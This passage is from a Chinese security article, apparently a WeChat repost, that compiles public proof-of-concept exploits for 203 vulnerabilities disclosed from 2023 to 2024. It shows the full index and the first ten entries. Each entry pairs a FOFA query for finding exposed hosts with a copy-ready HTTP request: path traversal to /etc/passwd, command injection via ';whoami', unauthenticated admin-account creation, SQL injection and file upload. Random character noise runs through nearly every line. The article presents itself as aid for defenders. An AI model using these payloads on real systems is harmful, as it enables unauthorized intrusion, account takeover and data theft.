互联网公开漏洞整理202309-202406
8 ?( B% ~5 w$ o% @' \道一安全 2024-06-05 07:41 北京0 c# Q6 s3 F8 R/ m' P- }
以下文章来源于网络安全新视界 ,作者网络安全新视界( a% E9 g( {5 t) R& x7 L/ y
3 h2 V3 U7 U% n% `1 N
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。% Z* m1 O) e9 j' r7 Y4 _
6 [ U* p/ i; d! {. P" H6 n0 m+ G漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。0 I% g! V' T1 G, V
/ D( M4 U. X1 W3 O. _5 f% g8 w
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。: q9 O- l+ v4 S& P4 k( w
" T i* `3 l1 t y8 [ v- }
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
) W4 p a4 l' t) |# f/ T0 \& c
% Y+ @/ f$ K1 t) z( h+ D4 j0 f& b$ Y合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
/ T& } w2 Z. B( S0 e+ Z7 V1 v5 w' \
& e4 [& S) T9 o% H3 ~- n
声明/ P! ^1 E) }# F
/ a4 E4 ]& [2 d% O: s8 ^为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。2 t7 A+ |" l% W# ?% O
7 J9 x9 f" A% U: Y
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
1 [, t/ D M: Z; {( c4 Y! W+ w
4 W, `; e% E. G5 k) [
+ }: q- e' v# e _. ]6 d4 ~/ B! o6 m1 }- j; q. _
目录
+ z6 q, ?3 `; @. h; r# ?( r5 f" F- i: U
01' x1 n+ A |$ _& V
; U' _4 ]4 m4 Q. @# r0 ^% w8 @1. StarRocks MPP数据库未授权访问
1 o4 T; A6 {& g2 X' T7 Q2 Y2. Casdoor系统static任意文件读取
4 G( J: D) C0 D- n$ L1 V3. EasyCVR智能边缘网关 userlist 信息泄漏
- W6 X k$ r* {* @4. EasyCVR视频管理平台存在任意用户添加
* T$ T7 _: o6 q4 y9 b5. NUUO NVR 视频存储管理设备远程命令执行8 D# b# z5 J7 G% T0 R
6. 深信服 NGAF 任意文件读取: l# i8 z: I3 z0 Z5 t7 a- W
7. 鸿运主动安全监控云平台任意文件下载
1 u3 d# w4 J9 G' [# ?2 l% S# V8. 斐讯 Phicomm 路由器RCE: B- W7 M. n- j1 G6 e- t
9. 稻壳CMS keyword 未授权SQL注入0 i7 ~3 w. T, ?
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
- [8 T% D! V' s11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
( G3 A% f* h, B12. Jorani < 1.0.2 远程命令执行
$ {& z( j- c: t13. 红帆iOffice ioFileDown任意文件读取; o. |. _; o& d5 ]6 V! G
14. 华夏ERP(jshERP)敏感信息泄露; ~) C: V8 g, {# q
15. 华夏ERP getAllList信息泄露
, s7 k6 Y, w2 l( S. X6 j16. 红帆HFOffice医微云SQL注入
& ?& |, n" K* W) K9 R D17. 大华 DSS itcBulletin SQL 注入- L! F! ]- K( n
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
* |: U ^* c/ }# H7 ~. {19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* j/ K, x8 P5 i& `2 s; [) o
20. 大华ICC智能物联综合管理平台任意文件读取
: _% Z- y* B! t! ]' }& z/ O21. 大华ICC智能物联综合管理平台random远程代码执行
$ S8 x$ s) T+ p2 ]$ ^: ^$ }- X22. 大华ICC智能物联综合管理平台 log4j远程代码执行
' ~& e' H" A7 ^; w* [23. 大华ICC智能物联综合管理平台 fastjson远程代码执行1 Y; V$ t( f5 f+ a0 F
24. 用友NC 6.5 accept.jsp任意文件上传
+ q! ^* `) { E+ }' d& ~25. 用友NC registerServlet JNDI 远程代码执行6 K5 g" }9 f* \+ W5 r9 I" u, c
26. 用友NC linkVoucher SQL注入$ j6 ?1 l' r! ~0 A$ s' _: v( \7 Q# w
27. 用友 NC showcontent SQL注入
0 }3 U& Q2 ~5 w, P# k/ I* W28. 用友NC grouptemplet 任意文件上传" w! b# u; j4 G( ?
29. 用友NC down/bill SQL注入
3 j$ ^# @4 u9 h/ b" m) _+ i' ], z) ~30. 用友NC importPml SQL注入) a& s% z6 A. O+ w+ G8 q
31. 用友NC runStateServlet SQL注入3 P# ~% F$ V8 J: K/ R5 C
32. 用友NC complainbilldetail SQL注入
8 j5 l% Z9 H9 O33. 用友NC downTax/download SQL注入
; r( ~; W. M: [. m8 B34. 用友NC warningDetailInfo接口SQL注入
+ [- t7 s, {' z35. 用友NC-Cloud importhttpscer任意文件上传+ |! K; L9 ]# L: h+ B9 Q) ^4 l
36. 用友NC-Cloud soapFormat XXE" ~& \1 {2 L) E
37. 用友NC-Cloud IUpdateService XXE
# ]4 P, F, A6 |5 _% r3 }* _38. 用友U8 Cloud smartweb2.RPC.d XXE: C0 x2 V) G1 V* v1 k4 Z3 y
39. 用友U8 Cloud RegisterServlet SQL注入" F2 |$ R: J2 z$ Z o: o
40. 用友U8-Cloud XChangeServlet XXE8 |) R+ m8 U% y$ j7 D1 |
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 X5 k0 G h$ M9 F42. 用友GRP-U8 SmartUpload01 文件上传; J" a6 M ^* W( K, @, h! q( e
43. 用友GRP-U8 userInfoWeb SQL注入致RCE% n" j. `3 `! `) Z8 E1 a, r
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
0 R3 T/ `/ q. N" _8 ? N! z45. 用友GRP-U8 ufgovbank XXE' _6 z" k" |0 v8 K( E# n% t) z7 A
46. 用友GRP-U8 sqcxIndex.jsp SQL注入& j7 |4 e+ k6 Z8 y5 _/ s
47. 用友GRP A++Cloud 政府财务云 任意文件读取
- b2 T. [5 r& K9 {) W48. 用友U8 CRM swfupload 任意文件上传* ?$ b y9 B' y. H% P* }
49. 用友U8 CRM系统uploadfile.php接口任意文件上传" k- K: V- m9 H N
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 z/ d5 j9 j8 D1 \/ e/ ?: U4 X
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
w$ G4 y' J: t# B( l8 i$ q52. 泛微E-Office json_common.php sql注入
6 p5 P* T8 h9 |/ y53. 迪普 DPTech VPN Service 任意文件上传 e$ `* D$ H5 ?: {' m
54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ @9 V `7 b+ t% X1 T" `
55. 畅捷通T+ getdecallusers信息泄露
/ a7 g& G/ ?4 i- N' E: J56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
- B9 e4 T( U- L57. 畅捷通T+ keyEdit.aspx SQL注入% u9 y; f% e/ m6 Z
58. 畅捷通T+ KeyInfoList.aspx sql注入
/ R/ [. m' C" `+ F& L59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ H7 n, g7 M3 c2 m60. 百卓Smart管理平台 importexport.php SQL注入
( B( b1 f, t# b' C: O9 [5 E! ]61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 e z9 D/ l" I6 a
62. IP-guard WebServer 远程命令执行! h e( }* W( P
63. IP-guard WebServer任意文件读取
# j9 k. D$ Q" q64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 ^; X( n! P9 j( f6 W* f1 f65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过- j! D. T7 v! B8 o8 J
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 T# V1 t) q, h/ T7 L
67. 万户ezOFFICE wpsservlet任意文件上传
r0 c# @. |, i; u' k68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 ]& k8 U6 I' W8 z0 z- U69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 A. @# L8 G; |' y9 S70. 万户ezEIP success 命令执行 H2 Z M; a/ S* j- h
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入 Y# W( ~3 H8 h4 X
72. 致远OA getAjaxDataServlet XXE$ c# N2 @5 w+ f7 l& C8 a d
73. GeoServer wms远程代码执行
# B6 H: N; H# Y% V/ z3 j5 a3 }74. 致远M3-server 6_1sp1 反序列化RCE7 y, T; W) v. k/ V; q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE; i( Z0 V E, u) R$ U
76. 新开普掌上校园服务管理平台service.action远程命令执行
9 S! p% n1 z3 Z. A$ C1 K& @77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ _1 d. ~+ N" f* w: j+ R( ?2 y' Z5 a78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 g% Y; U! S. m9 ?* b79. BYTEVALUE 百为流控路由器远程命令执行6 ~ Y% @& D: b8 F* ]$ O( M2 g
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传: `' E# g! w& Q9 |
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露6 w1 y. w' v+ q* S& n0 J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行$ D: g' @- v% k& y
83. JeecgBoot testConnection 远程命令执行9 J+ J6 j/ k! S% R ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) f/ p3 o1 Y% ~$ P
85. SysAid On-premise< 23.3.36远程代码执行
9 w- y2 Y2 }: I2 N" B86. 日本tosei自助洗衣机RCE
( r% Z! i. H- E& f+ c7 A T87. 安恒明御安全网关aaa_local_web_preview文件上传, I6 ~9 k* c. [$ f! i. Z2 I5 ~
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ E% a5 V9 k, ]$ q) ^ o6 M89. 致远互联FE协作办公平台editflow_manager存在sql注入; q J% X/ X. v s6 f& n
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( W3 V3 S( h: ]( |/ S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
: X6 u) M/ A) |0 l$ h92. 海康威视运行管理中心session命令执行
6 G. h% d. U; |: }( L: A( W* v93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
z" B" ~, v: P& S( @9 g94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- r0 G4 X4 R; M" g
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% Z& H6 H- E/ S0 e) H
96. Apache OFBiz 18.12.11 groovy 远程代码执行! b0 Z! G: F4 p( u/ E' G* f
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行- A6 x; ^) [& A- y) Y
98. SpiderFlow爬虫平台远程命令执行7 L7 l( v8 a9 o8 ~( d+ k
99. Ncast盈可视高清智能录播系统busiFacade RCE
' v* q( i3 f' g4 W" D100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& o5 Y @6 _5 U- a
101. ivanti policy secure-22.6命令注入
6 }- ^# E+ e. S, v6 R102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
4 f' ?; a0 {0 Q' @0 w103. Ivanti Pulse Connect Secure VPN XXE+ \! d, S2 x8 \$ R! L& C0 p) g
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
9 k9 `% g/ P: T* _( `/ D( c105. SpringBlade v3.2.0 export-user SQL 注入
$ D, F: l6 T0 o( w106. SpringBlade dict-biz/list SQL 注入
' e- _0 ?! j4 k6 }* w9 q0 U107. SpringBlade tenant/list SQL 注入
8 Z) G; @: C' T( D( ~/ O108. D-Tale 3.9.0 SSRF
2 N s+ j5 ~6 [4 K109. Jenkins CLI 任意文件读取0 P% m5 c% X/ n- D7 t9 W0 s$ `
110. Goanywhere MFT 未授权创建管理员& N2 t6 s, C9 b; ]6 N$ S% _; J
111. WordPress Plugin HTML5 Video Player SQL注入+ z+ s: S3 [2 x6 g/ d
112. WordPress Plugin NotificationX SQL 注入, `- k& m1 w6 e" [8 f3 G
113. WordPress Automatic 插件任意文件下载和SSRF
( c7 O w; \1 ?" }! _' u114. WordPress MasterStudy LMS插件 SQL注入2 S& w* n( o3 a; X4 J! _
115. WordPress Bricks Builder <= 1.9.6 RCE4 H3 a. V3 y, \
116. wordpress js-support-ticket文件上传. }2 X* P# F, k, j/ D7 u
117. WordPress LayerSlider插件SQL注入
* s4 G+ f8 U3 K118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
a. A: n$ Z8 L% o! e1 Y* W. k& l119. 北京百绰智能S20后台sysmanageajax.php sql注入4 `2 T. B; I4 u/ k$ d/ x" m
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ d( [8 o' e0 P& W+ x
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
, Y( ~! X1 Y) Y' c* @122. 北京百绰智能s200管理平台/importexport.php sql注入! @ w9 }, e+ U
123. Atlassian Confluence 模板注入代码执行
) `6 a& E' G- d n' o* C. r% s3 L124. 湖南建研工程质量检测系统任意文件上传8 @2 Y, e/ S! o' A% {. I3 ^
125. ConnectWise ScreenConnect身份验证绕过; j; B. r1 i# I/ C. I- ~4 h! D$ u$ r. r
126. Aiohttp 路径遍历
; f: |; Y$ T& J( n9 f8 j127. 广联达Linkworks DataExchange.ashx XXE
, [. {2 X# f0 A2 R8 P) J. c128. Adobe ColdFusion 反序列化$ i8 ?4 ^8 \% p( m, x h( f/ h# O( K
129. Adobe ColdFusion 任意文件读取) i8 {: E- q* K; p, Y
130. Laykefu客服系统任意文件上传5 D% q' [ {- [: v' q7 r) o
131. Mini-Tmall <=20231017 SQL注入& K* R" F- z/ D( i" S$ f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; M! k+ Z) K+ e6 V4 ^" @- J4 {7 q
133. H5 云商城 file.php 文件上传8 Q2 _# ~' o# C* E2 g
134. 网康NS-ASG应用安全网关index.php sql注入+ J. h% W8 l) S0 L; x
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ `$ d, O. R: [8 O0 g136. NextChat cors SSRF
: ^' @: f+ |. J( Z9 N& R137. 福建科立迅通信指挥调度平台down_file.php sql注入, G- \7 D* I. I& X" n
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
^2 H5 e0 `( v% C, y5 O% h139. 福建科立讯通信指挥调度平台editemedia.php sql注入
% t$ z% E8 T( |+ ]( W0 _' x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 o# W1 \! t+ w, m141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
2 G( t; @- B$ G142. CMSV6车辆监控平台系统中存在弱密码
7 j; R, W4 x! A& i; D2 ^143. Netis WF2780 v2.1.40144 远程命令执行. {1 q5 R9 u% V1 r3 D* g
144. D-Link nas_sharing.cgi 命令注入# ]: z5 @1 W5 s; n% a& I
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入2 j1 J# C+ R. i! B" K% b
146. MajorDoMo thumb.php 未授权远程代码执行2 ?% V8 q6 e8 I3 _5 j% n
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 r& u% N' F- w& R/ K/ [
148. CrushFTP 认证绕过模板注入/ E3 [! Z3 x9 i3 W! l; V, ~4 g
149. AJ-Report开源数据大屏存在远程命令执行' J; F8 d# R) R; b( T
150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 }& ^( ~. \2 n, h7 c151. AJ-Report 1.4.1 pageList sql注入- A7 y& c" o2 C! Q
152. Progress Kemp LoadMaster 远程命令执行; h/ e& I; u) x
153. gradio任意文件读取$ W/ l4 A/ i1 j3 B& v
154. 天维尔消防救援作战调度平台 SQL注入& J1 U K" R( _9 v
155. 六零导航页 file.php 任意文件上传
4 M$ q, G& P* b* g156. TBK DVR-4104/DVR-4216 操作系统命令注入$ I. M9 }. `/ F& z( X! w
157. 美特CRM upload.jsp 任意文件上传
# m7 r4 f( G& z& @9 ]158. Mura-CMS-processAsyncObject存在SQL注入2 H y* p, A# J% H7 r" t: X! L# K
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
7 S; q& x8 t8 c) t- i160. Sonatype Nexus Repository 3目录遍历与文件读取/ z' e, k" W: H& S% F; n9 H% l" \
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传) e9 V9 ^, e( }8 O3 {
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
; w6 @6 J2 I& ?4 {) T163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 F: [, d {% H3 \8 B+ S! o$ w5 n
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传2 `* w& b I+ g1 U/ Q
165. OrangeHRM 3.3.3 SQL 注入/ U& F7 [. I# q I4 t/ ~/ b
166. 中成科信票务管理平台SeatMapHandler SQL注入
4 r& a# ]1 F9 x- U' e( D167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 W: h* ^% \2 v; H% E168. 宏景EHR OutputCode 任意文件读取% r) V% e- g' t" `5 ~& \' ~
169. 宏景EHR downlawbase SQL注入
6 Y0 V1 g0 Z0 U( T5 D( H+ O+ \170. 宏景EHR DisplayExcelCustomReport 任意文件读取
3 r1 T' h) K3 Y7 r( |% X$ m171. 通天星CMSV6车载定位监控平台 SQL注入- e1 _5 L! C5 H
172. DT-高清车牌识别摄像机任意文件读取
/ H# O0 E, T1 r7 o( o, ~8 R' M* Q7 P173. Check Point 安全网关任意文件读取' h3 E( K4 {& ]6 `/ ^% `( H
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
: n {$ e j9 q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入4 v, g* A8 m3 E8 s7 f: f
176. 电信网关配置管理系统 rewrite.php 文件上传
7 Y' ^" b; O7 c g+ K0 m- \177. H3C路由器敏感信息泄露
) S5 \! ^- k5 S, r178. H3C校园网自助服务系统-flexfileupload-任意文件上传% i% T& g. N4 ]9 u. q- m, K
179. 建文工程管理系统存在任意文件读取3 }! b- b7 Z, k# g" e! z
180. 帮管客 CRM jiliyu SQL注入
2 S! E5 n" ^7 K( y7 Q2 ?) E181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
s3 x/ ^9 B* }( @; {182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- E5 k; d' o" `: P1 a8 d4 J
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
+ E# o1 f! M: A8 h184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
2 z* m' F# w7 q185. 瑞友天翼应用虚拟化系统SQL注入
5 }. |+ L: W1 O6 G7 t9 X" d186. F-logic DataCube3 SQL注入
1 C& z) d1 }3 p) @! P187. Mura CMS processAsyncObject SQL注入
! x; G( N# @/ y! q( \188. 叁体-佳会视频会议 attachment 任意文件读取+ O: q9 W) s5 N; B
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% m6 J6 S3 _* N& p4 r* X6 g190. 短视频矩阵营销系统 poihuoqu 任意文件读取
9 T% S0 ^+ p. z. h/ B6 w% y191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
1 p Z. ]1 p7 [+ `# P' G- |8 q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
' E% J: F! {8 M* R7 E& x5 ]6 [193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行, V( q- O! q) H, Q1 Y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
# I: u. r; `2 `/ `7 Q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行/ l4 {' e4 i0 P
196. 河南省风速科技统一认证平台密码重置
/ q8 t, Y3 z# E% k197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
! b" _# } {- `! \$ c198. 阿里云盘 WebDAV 命令注入) Q: I& `+ J5 f r5 X& p$ i" g) I1 [6 s
199. cockpit系统assetsmanager_upload接口 文件上传
0 [# v1 ?1 W+ m( i. X' W, J200. SeaCMS海洋影视管理系统dmku SQL注入# k: Z$ t c. ^# N6 _
201. 方正全媒体新闻采编系统 binary SQL注入! C4 @# a' x6 @1 r4 @/ |
202. 微擎系统 AccountEdit任意文件上传
; f$ T' K1 G+ [# C2 v% w8 z( U; f203. 红海云EHR PtFjk 文件上传! _- o; Y/ }. H
8 l6 N/ U" o/ M" }7 n; K
POC列表4 ^, d0 K4 g5 Y' D( h! }
1 t6 A4 s0 c5 z. M- C+ @
02
" y2 {; b2 J9 b9 Y! E: i' c8 ?. x$ E
1. StarRocks MPP数据库未授权访问
5 j! G" B( ]+ Y7 ZFOFA :title="StarRocks"$ n. D: h# G9 Y |7 k
GET /mem_tracker HTTP/1.1
3 `: G6 C" g/ m- x0 jHost: URL" R J2 U8 A) o; N
0 o! K! N; O' D$ \. I) y: _: ]& F, a
' _% j4 D5 [$ g3 J; a) i$ O0 e' V2. Casdoor系统static任意文件读取/ m) }4 C( l3 Z% j/ C
FOFA :title="Casdoor"# c7 \7 v& W% X; k
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: q) p# v' L' K- z4 h$ E- SHost: xx.xx.xx.xx:9999# x/ M# r! T6 X6 f' E, c4 _6 H5 O ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! |) r( }4 d4 T# SConnection: close3 J9 P- `3 \! H" V
Accept: */*
- D, N( m5 t& Z# xAccept-Language: en5 k' k- f( _. _9 j
Accept-Encoding: gzip
' Z+ d/ D2 p: Q( k4 g/ g
9 g! t$ e8 H! E# T* j$ d
) g t0 d' o" l: ^( l1 a3. EasyCVR智能边缘网关 userlist 信息泄漏* C: p+ `" q/ }( X, U5 P- D* c
FOFA :title="EasyCVR"( k) A9 E& F4 b( f& ? h% m2 f: S
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
5 B5 u E! A4 [3 i# }Host: xx.xx.xx.xx
! t) o- n* L) ?( B+ I+ H+ M
2 _* _, X( G/ E3 q0 S# _: e0 I9 y6 y1 x) k; X# Z( @
4. EasyCVR视频管理平台存在任意用户添加* b, S& i5 l- K, l% ~
FOFA :title="EasyCVR"
) { F/ `; S o; k; e) ~# O: n: j) `3 Y2 P, P' b0 _
password更改为自己的密码md53 H# x" ]1 h3 K0 H) D/ @! K
POST /api/v1/adduser HTTP/1.1! U/ g1 v2 H ~% M
Host: your-ip6 D" [0 E+ K3 l# A/ X+ Z; @0 X( ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 R% S% \+ S0 e) w9 B" U. a4 i
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
2 p1 S( i! p8 ^& C
$ H+ J9 t2 k- H2 s( A4 G$ s1 M8 N; x2 k6 T* r
5. NUUO NVR 视频存储管理设备远程命令执行
* f1 y9 _4 c1 nFOFA:title="Network Video Recorder Login"4 M+ f3 e3 e+ I- u2 }3 h' P
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
) I, a0 m- A% q& R2 I6 l% iHost: xx.xx.xx.xx7 ~4 R5 E8 |. l3 X( {
! m& O$ V# l* K) h+ @
0 S8 I. D; ?" L$ K3 r. s. O# m6 J
6. 深信服 NGAF 任意文件读取
* Y5 Z- a) c6 m# y, I; WFOFA:title="SANGFOR | NGAF"
" x$ O- i. l4 q% h4 a7 J7 U% cGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" k+ @0 P0 U. k5 o& E* j; n8 K
Host:+ [& V- H$ l: Q" s& v3 T
; Q# w4 ]- j/ O1 p3 j* g; m; C" G& J0 {
! }+ M& G$ t" t [# `2 h# P
7. 鸿运主动安全监控云平台任意文件下载& R( |/ `; c1 A! `7 ^& `+ y
FOFA:body="./open/webApi.html"
2 O. Z: G# W5 } jGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.18 d- \; O. T% y$ A' F$ _
Host:5 [; D% U! Z$ e4 ]0 Z
3 R H2 F1 L: \: Y1 w. b$ U/ V/ Y) }2 H0 C. e1 ?& i+ f
8. 斐讯 Phicomm 路由器RCE6 p1 y' w- O4 h/ W1 |: e8 D5 {
FOFA:icon_hash="-1344736688"/ e- ?% s( _6 A. s" w5 w1 Y
默认账号admin登录后台后,执行操作4 _7 w+ C& Z5 _ s2 }$ [/ y. Z& @4 {
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
- ^8 G7 k: f3 b) `' N" l( A. ?Host: x.x.x.x
" ?8 J; }, @1 o. w! |Cookie: sysauth=第一步登录获取的cookie v0 ^; m' w) c& }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz! t. [8 c" r6 l+ G8 n
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 R4 y! K5 t! D2 O' v$ G6 x: L8 `2 w$ \8 H+ D. V0 g
------WebKitFormBoundaryxbgjoytz6 r9 W2 ^9 c) o, k2 A* K
Content-Disposition: form-data; name="wifiRebootEnablestatus" o! K: B2 f4 L; C- Q# v3 h
+ Q; u- z: r! B5 o4 O B
%s
( o, n" l& T5 @) w( J------WebKitFormBoundaryxbgjoytz+ s: f/ [! H/ b6 }$ n$ N
Content-Disposition: form-data; name="wifiRebootrange"
- L* l! K: ?- B7 G7 ?9 { v0 I. Y% K% ] E
12:00; id;
8 q( v& }# g& j9 ?( T% W( P5 W" b------WebKitFormBoundaryxbgjoytz/ y, L- g. J* ]! c* ]/ p& T, ~
Content-Disposition: form-data; name="wifiRebootendrange"
- O; @" Z- M% Z' `# v3 m5 H/ y
4 ^+ B9 Z3 ~7 t%s:
" ?9 v1 J$ P0 ]7 n- x- i& l3 J k; X------WebKitFormBoundaryxbgjoytz0 [2 [" q" q4 r l- ]
Content-Disposition: form-data; name="cururl2"! l5 M3 b% r1 O
K# {. }6 {6 Z, k
, f6 H& I1 Z6 I; X- z2 d------WebKitFormBoundaryxbgjoytz--4 U+ |9 @+ f* z& ^
' v0 {1 S2 u6 i# t4 }
* u+ |* I$ J I
9. 稻壳CMS keyword 未授权SQL注入+ j7 j5 y9 B2 e9 ?5 z& j6 O
FOFA:app="Doccms"
4 u' B* |8 x% f) q5 S! U8 aGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.17 m$ [( u! a3 E" d, s
Host: x.x.x.x+ B2 d" d& B7 X
- n1 T! x) Y: m/ ~( u$ A0 c' M+ U/ r& C! Q1 e
payload为下列语句的二次Url编码
- `: A5 }/ l3 S' B, P( Z
* ^7 u. S$ w% K" V6 Q2 s( ?' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
7 X& f0 J* p% S; n. x, c4 h" e
" M% q. N* _+ |9 t7 W ^: d10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
( d7 o9 y# w4 |FOFA:icon_hash="953405444"* O! y: }4 p) l, t. |+ X7 i+ k
0 z' t2 w4 p$ y- t
文件上传后响应中包含上传文件的路径; v% ]; s) F$ y! S
POST /eis/service/api.aspx?action=saveImg HTTP/1.19 A- f0 n7 W8 E' R9 L
Host: x.x.x.x:xx
5 [& Y. H$ p! X1 H; W; j7 {% L' JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# f: `$ Y* N; ]/ QContent-Length: 197
, i4 L s) P) j8 X fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.96 B/ Z: X6 J3 Q) U8 @
Accept-Encoding: gzip, deflate# F! X8 x) J. B. V) s7 @) ?, u2 ?
Accept-Language: zh-CN,zh;q=0.9* [. c' Y6 C/ \' Z; o
Connection: close2 k& l! l2 Q5 S0 d2 n( @9 f* J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 l4 N6 d# _9 e L) c/ V
" I; r% A6 O! z" F& r9 s------WebKitFormBoundaryxdgaqmqu I) Y/ _, V6 _. l; e5 c+ |3 n
Content-Disposition: form-data; name="file"filename="icfitnya.txt") _# n, p. y8 S# ~ @" u8 k+ |: V$ d# C
Content-Type: text/html! I7 J2 ^, S2 z. J* C- r
+ o2 d9 _% D+ F( yjmnqjfdsupxgfidopeixbgsxbf/ r1 K% L8 V4 T! H; z
------WebKitFormBoundaryxdgaqmqu--
- x6 t) s" t6 P* x, { z! f
* o( T1 }* ]$ o1 U( e- N6 n7 {6 U8 E+ H& h9 j
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
7 ]( f; l4 _, X3 dFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
